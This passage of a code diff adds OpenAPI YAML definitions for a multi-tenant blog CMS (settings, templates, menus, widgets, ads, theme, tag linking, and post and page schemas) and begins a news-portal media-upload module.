+      description: Gated by blog_content.taxonomies.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Term soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogTerm"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/search:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogSearchContent
+      summary: Full-text search across posts and pages
+      description: Gated by blog_content.search.read. May return content of any status per the caller's granted permission. Keyset-paginated (?cursor=).
+      parameters:
+        - name: q
+          in: query
+          required: true
+          schema:
+            type: string
+        - name: resourceType
+          in: query
+          schema:
+            type: string
+            enum: [post, page]
+        - name: status
+          in: query
+          schema:
+            type: string
+            enum: [draft, review, scheduled, published, archived]
+        - name: cursor
+          in: query
+          schema:
+            type: string
+        - name: limit
+          in: query
+          schema:
+            type: integer
+            minimum: 1
+            maximum: 100
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching results.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      items:
+                        type: array
+                        items:
+                          type: object
+                      nextCursor:
+                        type: string
+                        nullable: true
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/settings:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetSettings
+      summary: Read this tenant's blog settings
+      description: Gated by blog_content.settings.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The tenant's blog settings.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateSettings
+      summary: Update this tenant's blog settings
+      description: Gated by blog_content.settings.configure. Only fields present in the body are changed.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+      responses:
+        "200":
+          description: Settings updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/templates:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListTemplates
+      summary: List this tenant's presentation templates
+      description: Gated by blog_content.templates.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching templates.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      templates:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateTemplate
+      summary: Create a presentation template
+      description: "Gated by blog_content.templates.configure. layoutJson is a whitelisted shape: { columns: 1|2|3, sidebarPosition: left|right|none }."
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required: [key, name]
+              properties:
+                key:
+                  type: string
+                name:
+                  type: string
+                layoutJson:
+                  type: object
+                isActive:
+                  type: boolean
+      responses:
+        "200":
+          description: Template created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A template already exists for this key.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/templates/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateTemplate
+      summary: Update a presentation template
+      description: Gated by blog_content.templates.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                name:
+                  type: string
+                layoutJson:
+                  type: object
+                isActive:
+                  type: boolean
+      responses:
+        "200":
+          description: Template updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteTemplate
+      summary: Soft delete a presentation template
+      description: Gated by blog_content.templates.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Template soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/menus:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListMenus
+      summary: List this tenant's navigation menus (with items)
+      description: Gated by blog_content.menus.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching menus.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      menus:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateMenu
+      summary: Create a navigation menu
+      description: "Gated by blog_content.menus.configure. Optionally seeds its initial items tree (one level of nesting; link_type post|page|url gates target_id/url)."
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required: [key, name]
+              properties:
+                key:
+                  type: string
+                name:
+                  type: string
+                items:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogMenuItem"
+      responses:
+        "200":
+          description: Menu created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "409":
+          description: A menu already exists for this key.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/blog/menus/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateMenu
+      summary: Update a navigation menu (name and/or its items tree)
+      description: Gated by blog_content.menus.configure. Providing items replaces the whole tree.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                name:
+                  type: string
+                items:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogMenuItem"
+      responses:
+        "200":
+          description: Menu updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteMenu
+      summary: Soft delete a navigation menu
+      description: Gated by blog_content.menus.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Menu soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/widgets:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListWidgets
+      summary: List this tenant's widgets
+      description: Gated by blog_content.widgets.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching widgets.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      widgets:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateWidget
+      summary: Create a widget
+      description: Gated by blog_content.widgets.configure. bodyText is plain text, escaped at render time (no raw-HTML field).
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required: [position, title]
+              properties:
+                position:
+                  type: string
+                  enum: [header, sidebar, footer, content_before, content_after]
+                title:
+                  type: string
+                bodyText:
+                  type: string
+                isActive:
+                  type: boolean
+                sortOrder:
+                  type: integer
+      responses:
+        "200":
+          description: Widget created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/widgets/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateWidget
+      summary: Update a widget
+      description: Gated by blog_content.widgets.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                position:
+                  type: string
+                  enum: [header, sidebar, footer, content_before, content_after]
+                title:
+                  type: string
+                bodyText:
+                  type: string
+                isActive:
+                  type: boolean
+                sortOrder:
+                  type: integer
+      responses:
+        "200":
+          description: Widget updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteWidget
+      summary: Soft delete a widget
+      description: Gated by blog_content.widgets.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Widget soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/ads:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogListAds
+      summary: List this tenant's advertisements
+      description: Gated by blog_content.ads.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Matching ads.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      ads:
+                        type: array
+                        items:
+                          type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    post:
+      tags:
+        - Blog Content
+      operationId: blogCreateAd
+      summary: Create an advertisement
+      description: "Gated by blog_content.ads.configure. imageUrl/linkUrl must be absolute http(s) URLs (never raw HTML/embed markup). Optionally seeds its initial placements (global|widget|post|page; targetId required except for global)."
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required: [name, imageUrl]
+              properties:
+                name:
+                  type: string
+                imageUrl:
+                  type: string
+                linkUrl:
+                  type: string
+                  nullable: true
+                isActive:
+                  type: boolean
+                startsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                endsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                placements:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogAdPlacement"
+      responses:
+        "200":
+          description: Ad created.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/ads/{id}:
+    parameters:
+      - name: id
+        in: path
+        required: true
+        schema:
+          type: string
+          format: uuid
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateAd
+      summary: Update an advertisement (and/or its placements)
+      description: Gated by blog_content.ads.configure. Providing placements replaces the whole set.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                name:
+                  type: string
+                imageUrl:
+                  type: string
+                linkUrl:
+                  type: string
+                  nullable: true
+                isActive:
+                  type: boolean
+                startsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                endsAt:
+                  type: string
+                  format: date-time
+                  nullable: true
+                placements:
+                  type: array
+                  items:
+                    $ref: "#/components/schemas/BlogAdPlacement"
+      responses:
+        "200":
+          description: Ad updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+    delete:
+      tags:
+        - Blog Content
+      operationId: blogDeleteAd
+      summary: Soft delete an advertisement
+      description: Gated by blog_content.ads.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Ad soft-deleted.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "404":
+          $ref: "#/components/responses/NotFound"
+  /api/v1/blog/theme:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetTheme
+      summary: Read this tenant's blog theme mode setting
+      description: Gated by blog_content.theme.read. Absence of a row means "inherit the tenant's default_theme".
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The theme setting.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      mode:
+                        type: string
+                        enum: [light, dark, system]
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateTheme
+      summary: Update this tenant's blog theme mode setting
+      description: Gated by blog_content.theme.configure.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              required: [mode]
+              properties:
+                mode:
+                  type: string
+                  enum: [light, dark, system]
+      responses:
+        "200":
+          description: Theme setting updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    type: object
+                    properties:
+                      mode:
+                        type: string
+                        enum: [light, dark, system]
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+  /api/v1/blog/internal-tag-links/settings:
+    get:
+      tags:
+        - Blog Content
+      operationId: blogGetInternalTagLinkSettings
+      summary: Read this tenant's automatic internal tag linking policy
+      description: Gated by blog_content.internal_links.read.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: The policy.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogInternalTagLinkSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+    patch:
+      tags:
+        - Blog Content
+      operationId: blogUpdateInternalTagLinkSettings
+      summary: Update this tenant's automatic internal tag linking policy
+      description: Gated by blog_content.internal_links.configure. disabledTagIds are validated against this tenant's own tag catalog.
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              type: object
+              properties:
+                enabled:
+                  type: boolean
+                caseInsensitive:
+                  type: boolean
+                disabledTagIds:
+                  type: array
+                  items:
+                    type: string
+                    format: uuid
+      responses:
+        "200":
+          description: Policy updated.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/BlogInternalTagLinkSettings"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+components:
+  schemas:
+    BlogPostWriteInput:
+      type: object
+      description: Shared shape for POST /api/v1/blog/posts (all fields required) and PATCH /api/v1/blog/posts/{id} (all fields optional, only present fields change).
+      properties:
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+          description: "{ blocks: ContentBlock[] } — whitelisted block types only (paragraph, heading, list, quote, gallery, video_news); never raw HTML."
+        contentText:
+          type: string
+        locale:
+          type: string
+        visibility:
+          type: string
+          enum: [public, private, unlisted]
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoImageMediaId:
+          type: string
+          format: uuid
+          nullable: true
+          description: Explicit "use this image for social/SEO preview" override — takes priority over featuredMediaId.
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        termIds:
+          type: array
+          items:
+            type: string
+            format: uuid
+        translationGroupId:
+          type: string
+          format: uuid
+          nullable: true
+        autoInternalTagLinksDisabled:
+          type: boolean
+          description: Per-post opt-out of automatic internal tag linking.
+    BlogPost:
+      type: object
+      required:
+        [
+          id,
+          tenantId,
+          title,
+          slug,
+          status,
+          visibility,
+          locale,
+          createdAt,
+          updatedAt,
+          version
+        ]
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        authorTenantUserId:
+          type: string
+          format: uuid
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        status:
+          type: string
+          enum: [draft, review, scheduled, published, archived]
+        visibility:
+          type: string
+          enum: [public, private, unlisted]
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoImageMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        locale:
+          type: string
+        translationGroupId:
+          type: string
+          format: uuid
+          nullable: true
+        autoInternalTagLinksDisabled:
+          type: boolean
+        publishedAt:
+          type: string
+          format: date-time
+          nullable: true
+        scheduledAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+        version:
+          type: integer
+        termIds:
+          type: array
+          items:
+            type: string
+            format: uuid
+    BlogPageWriteInput:
+      type: object
+      description: Shared shape for POST /api/v1/blog/pages and PATCH /api/v1/blog/pages/{id} (all fields optional on update).
+      properties:
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        locale:
+          type: string
+        visibility:
+          type: string
+          enum: [public, private, unlisted]
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        pageType:
+          type: string
+          enum: [standard, landing, legal, system]
+        parentPageId:
+          type: string
+          format: uuid
+          nullable: true
+        menuOrder:
+          type: integer
+    BlogPage:
+      type: object
+      required:
+        [
+          id,
+          tenantId,
+          title,
+          slug,
+          status,
+          visibility,
+          pageType,
+          locale,
+          createdAt,
+          updatedAt,
+          version
+        ]
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        authorTenantUserId:
+          type: string
+          format: uuid
+        title:
+          type: string
+        slug:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        status:
+          type: string
+          enum: [draft, review, scheduled, published, archived]
+        visibility:
+          type: string
+          enum: [public, private, unlisted]
+        featuredMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        locale:
+          type: string
+        pageType:
+          type: string
+          enum: [standard, landing, legal, system]
+        parentPageId:
+          type: string
+          format: uuid
+          nullable: true
+        menuOrder:
+          type: integer
+        publishedAt:
+          type: string
+          format: date-time
+          nullable: true
+        scheduledAt:
+          type: string
+          format: date-time
+          nullable: true
+        createdAt:
+          type: string
+          format: date-time
+        updatedAt:
+          type: string
+          format: date-time
+        version:
+          type: integer
+    BlogTermWriteInput:
+      type: object
+      properties:
+        taxonomyType:
+          type: string
+          enum: [category, tag]
+        parentId:
+          type: string
+          format: uuid
+          nullable: true
+        name:
+          type: string
+        slug:
+          type: string
+        description:
+          type: string
+          nullable: true
+    BlogTerm:
+      type: object
+      required: [id, tenantId, taxonomyType, name, slug]
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        taxonomyType:
+          type: string
+          enum: [category, tag]
+        parentId:
+          type: string
+          format: uuid
+          nullable: true
+        name:
+          type: string
+        slug:
+          type: string
+        description:
+          type: string
+          nullable: true
+    BlogRevision:
+      type: object
+      required:
+        [
+          id,
+          tenantId,
+          resourceType,
+          resourceId,
+          revisionNumber,
+          title,
+          status,
+          createdAt
+        ]
+      properties:
+        id:
+          type: string
+          format: uuid
+        tenantId:
+          type: string
+          format: uuid
+        resourceType:
+          type: string
+          enum: [post, page]
+        resourceId:
+          type: string
+          format: uuid
+        revisionNumber:
+          type: integer
+        title:
+          type: string
+        contentJson:
+          type: object
+        contentText:
+          type: string
+        excerpt:
+          type: string
+          nullable: true
+        seoTitle:
+          type: string
+          nullable: true
+        metaDescription:
+          type: string
+          nullable: true
+        canonicalUrl:
+          type: string
+          nullable: true
+        status:
+          type: string
+        changeNote:
+          type: string
+          nullable: true
+        createdByTenantUserId:
+          type: string
+          format: uuid
+        createdAt:
+          type: string
+          format: date-time
+    BlogSettings:
+      type: object
+      properties:
+        blogTitle:
+          type: string
+          nullable: true
+        blogDescription:
+          type: string
+          nullable: true
+        defaultLocale:
+          type: string
+        defaultVisibility:
+          type: string
+          enum: [public, private, unlisted]
+        postsPerPage:
+          type: integer
+        seoDefaultTitle:
+          type: string
+          nullable: true
+        seoDefaultDescription:
+          type: string
+          nullable: true
+        rssEnabled:
+          type: boolean
+        sitemapEnabled:
+          type: boolean
+        contentQualityChecklistPolicy:
+          type: object
+        socialPreviewFallbackImageMediaId:
+          type: string
+          format: uuid
+          nullable: true
+        socialPreviewContentImageFallbackEnabled:
+          type: boolean
+    BlogMenuItem:
+      type: object
+      required: [id, label, linkType, sortOrder]
+      properties:
+        id:
+          type: string
+          format: uuid
+        parentItemId:
+          type: string
+          format: uuid
+          nullable: true
+        label:
+          type: string
+        linkType:
+          type: string
+          enum: [post, page, url]
+        targetId:
+          type: string
+          format: uuid
+          nullable: true
+        url:
+          type: string
+          nullable: true
+        sortOrder:
+          type: integer
+    BlogAdPlacement:
+      type: object
+      required: [placementType]
+      properties:
+        placementType:
+          type: string
+          enum: [global, widget, post, page]
+        targetId:
+          type: string
+          format: uuid
+          nullable: true
+    BlogInternalTagLinkSettings:
+      type: object
+      required: [enabled, caseInsensitive, disabledTagIds]
+      properties:
+        enabled:
+          type: boolean
+        caseInsensitive:
+          type: boolean
+        disabledTagIds:
+          type: array
+          items:
+            type: string
+            format: uuid
+    ContentQualityChecklistResult:
+      type: object
+      required: [applicable, passed, blockers]
+      description: "notApplicableChecklistResult() when full-online R2-only mode is not active for the tenant (applicable=false, passed=true, blockers=[]) — otherwise a full evaluation."
+      properties:
+        applicable:
+          type: boolean
+        passed:
+          type: boolean
+        blockers:
+          type: array
+          items:
+            type: object
+            required: [ruleId, message]
+            properties:
+              ruleId:
+                type: string
+              message:
+                type: string
+        warnings:
+          type: array
+          items:
+            type: object

--- a/openapi/modules/news-portal.openapi.yaml
+++ b/openapi/modules/news-portal.openapi.yaml
@@ -1,0 +1,950 @@
+# Source fragment for the "News Portal" module — ported from awcms-mini (epic
+# `news_portal` #631-#642/#649/#681/#690). One file per MODULE (Issue #182
+# convention): this file owns every path carrying one of this module's three
+# tags (News Media, News Portal Homepage Sections, News Portal Ad Placements)
+# and every schema referenced ONLY by those operations.
+#
+# Adapted to this base's shared-component vocabulary: success responses are
+# modelled inline (no `ApiSuccess` schema here), the Idempotency-Key header is
+# declared inline where a mutation requires it, and only the shared components
+# this base actually defines (CorrelationId; BadRequest/Unauthorized/Forbidden/
+# NotFound; ApiError) are referenced.
+#
+# PORT DROPS (see src/modules/news-portal/module.ts): the host-resolved
+# `/news/**` public route family and the `.astro` admin pages are not ported,
+# so no paths for them appear here — this fragment is the admin/media HTTP
+# surface only.
+#
+# NOT independently valid OpenAPI — $ref targets pointing at shared components
+# only resolve after `bun run openapi:bundle` merges this file with the root
+# and every sibling module fragment into openapi/awcms-public-api.openapi.yaml.
+# Edit this file (or the root for shared components), never the generated bundle.
+paths:
+  /api/v1/media/news-images/upload-sessions:
+    post:
+      tags:
+        - News Media
+      summary: Create a direct-to-R2 presigned upload session for a news image
+      description: Gated by news_portal.media.create. Returns a `pending_upload` metadata row plus a short-lived presigned PUT URL scoped to exactly one server-generated object key. Raw R2 credentials are never exposed to the browser.
+      operationId: newsMediaUploadSessionsCreate
+      parameters:
+        - $ref: "#/components/parameters/CorrelationId"
+      requestBody:
+        required: true
+        content:
+          application/json:
+            schema:
+              $ref: "#/components/schemas/CreateNewsMediaUploadSessionRequest"
+      responses:
+        "200":
+          description: Upload session created — a `pending_upload` metadata row plus a short-lived presigned PUT URL.
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/NewsMediaUploadSessionCreated"
+        "400":
+          $ref: "#/components/responses/BadRequest"
+        "401":
+          $ref: "#/components/responses/Unauthorized"
+        "403":
+          $ref: "#/components/responses/Forbidden"
+        "502":
+          description: News media R2 storage is not configured/enabled for this deployment.
+          content:
+            application/json:
+              schema:
+                $ref: "#/components/schemas/ApiError"
+  /api/v1/media/news-images/upload-sessions/{id}/cancel:
+    post:
+      tags:
+        - News Media
+      summary: Cancel a still-pending-upload session
+      description: Gated by news_portal.media.cancel. Transitions a `pending_upload` session to `failed`.
+      operationId: newsMediaUploadSessionsCancel
+      parameters:
+        - name: id
+          in: path
+          required: true
+          schema:
+            type: string
+            format: uuid
+        - $ref: "#/components/parameters/CorrelationId"
+      responses:
+        "200":
+          description: Upload session cancelled (status `failed`).
+          content:
+            application/json:
+              schema:
+                type: object
+                properties:
+                  success:
+                    type: boolean
+                    enum: [true]
+                  data:
+                    $ref: "#/components/schemas/NewsMediaObjectItem"
+        "400":
